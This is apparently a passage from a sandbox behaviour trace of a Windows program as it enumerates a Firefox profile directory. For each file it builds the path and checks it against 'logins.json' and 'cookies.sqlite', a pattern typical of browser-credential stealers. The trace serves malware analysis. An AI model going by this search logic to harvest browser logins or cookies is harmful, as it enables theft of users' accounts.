HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.139] lstrlenW (lpString="compatibility.ini") returned 17 [0161.139] GetProcessHeap () returned 0x8e0000 [0161.139] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x924a48 [0161.139] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.139] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="compatibility.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" [0161.139] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.139] GetProcessHeap () returned 0x8e0000 [0161.139] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.139] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="logins.json") returned 0x0 [0161.139] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.139] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.140] GetProcessHeap () returned 0x8e0000 [0161.140] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.140] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e8ce50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5e8ce50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb639bd10, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x38000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="content-prefs.sqlite", cAlternateFileName="CONTEN~1.SQL")) returned 1 [0161.140] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.140] lstrlenW (lpString="\\") returned 1 [0161.140] GetProcessHeap () returned 0x8e0000 [0161.140] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.140] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.140] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.140] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.140] lstrlenW (lpString="content-prefs.sqlite") returned 20 [0161.140] GetProcessHeap () returned 0x8e0000 [0161.140] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xda) returned 0x924a48 [0161.140] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.140] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="content-prefs.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite" [0161.140] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.140] GetProcessHeap () returned 0x8e0000 [0161.140] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.140] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="logins.json") returned 0x0 [0161.140] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.140] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.140] GetProcessHeap () returned 0x8e0000 [0161.140] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.140] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ad4bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5ad4bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x83256a10, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="cookies.sqlite", cAlternateFileName="COOKIE~1.SQL")) returned 1 [0161.140] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.140] lstrlenW (lpString="\\") returned 1 [0161.140] GetProcessHeap () returned 0x8e0000 [0161.140] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.140] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.140] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.140] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.140] lstrlenW (lpString="cookies.sqlite") returned 14 [0161.140] GetProcessHeap () returned 0x8e0000 [0161.141] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.141] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.141] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cookies.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite" [0161.141] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.141] GetProcessHeap () returned 0x8e0000 [0161.141] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.141] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="logins.json") returned 0x0 [0161.141] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite", lpSrch="cookies.sqlite") returned="cookies.sqlite" [0161.141] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite") returned 102 [0161.141] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x8fce90, Length=0xcc) returned 0x856f9ece [0161.141] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.141] GetProcessHeap () returned 0x8e0000 [0161.141] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.141] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc374ed0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbc374ed0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbc555e20, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x18000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="downloads.sqlite", cAlternateFileName="DOWNLO~1.SQL")) returned 1 [0161.141] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.141] lstrlenW (lpString="\\") returned 1 [0161.141] GetProcessHeap () returned 0x8e0000 [0161.141] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.141] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.141] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.141] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.141] lstrlenW (lpString="downloads.sqlite") returned 16 [0161.141] GetProcessHeap () returned 0x8e0000 [0161.141] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd2) returned 0x924a48 [0161.141] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.141] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="downloads.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite" [0161.141] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.141] GetProcessHeap () returned 0x8e0000 [0161.141] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.141] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="logins.json") returned 0x0 [0161.141] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.141] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.142] GetProcessHeap () returned 0x8e0000 [0161.142] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.142] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4b81e50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4b81e50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b81e50, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x8d, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="extensions.ini", cAlternateFileName="EXTENS~1.INI")) returned 1 [0161.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.142] lstrlenW (lpString="\\") returned 1 [0161.142] GetProcessHeap () returned 0x8e0000 [0161.142] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.142] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.142] lstrlenW (lpString="extensions.ini") returned 14 [0161.142] GetProcessHeap () returned 0x8e0000 [0161.142] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xce) returned 0x8fce90 [0161.142] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.ini" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" [0161.142] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.142] GetProcessHeap () returned 0x8e0000 [0161.142] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.142] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="logins.json") returned 0x0 [0161.142] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini", lpSrch="cookies.sqlite") returned 0x0 [0161.142] VirtualQuery (in: lpAddress=0x8fce90, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x8fc000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x4c000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.142] GetProcessHeap () returned 0x8e0000 [0161.142] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8fce90 | out: hHeap=0x8e0000) returned 1 [0161.142] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb45b48b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb45b48b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b0fa30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x70000, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="extensions.sqlite", cAlternateFileName="EXTENS~1.SQL")) returned 1 [0161.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.142] lstrlenW (lpString="\\") returned 1 [0161.142] GetProcessHeap () returned 0x8e0000 [0161.142] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.142] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.142] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.142] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.142] lstrlenW (lpString="extensions.sqlite") returned 17 [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xd4) returned 0x924a48 [0161.143] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.143] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" [0161.143] VirtualQuery (in: lpAddress=0x924988, lpBuffer=0x2df758, dwLength=0x1c | out: lpBuffer=0x2df758*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924988 | out: hHeap=0x8e0000) returned 1 [0161.143] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="logins.json") returned 0x0 [0161.143] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite", lpSrch="cookies.sqlite") returned 0x0 [0161.143] VirtualQuery (in: lpAddress=0x924a48, lpBuffer=0x2df764, dwLength=0x1c | out: lpBuffer=0x2df764*(BaseAddress=0x924000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x24000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x924a48 | out: hHeap=0x8e0000) returned 1 [0161.143] FindNextFileW (in: hFindFile=0x8f9a40, lpFindFileData=0x2df7b0 | out: lpFindFileData=0x2df7b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb6ff4f30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb701b090, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb701b090, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x76c52a4b, dwReserved1=0x0, cFileName="indexedDB", cAlternateFileName="INDEXE~1")) returned 1 [0161.143] lstrcmpiW (lpString1="indexedDB", lpString2=".") returned 1 [0161.143] lstrcmpiW (lpString1="indexedDB", lpString2="..") returned 1 [0161.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned 87 [0161.143] lstrlenW (lpString="\\") returned 1 [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x924988 [0161.143] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0161.143] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0161.143] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0161.143] lstrlenW (lpString="indexedDB") returned 9 [0161.143] GetProcessHeap () returned 0x8e0000 [0161.143] RtlAllocateHeap (HeapHandle=0x8e0000, 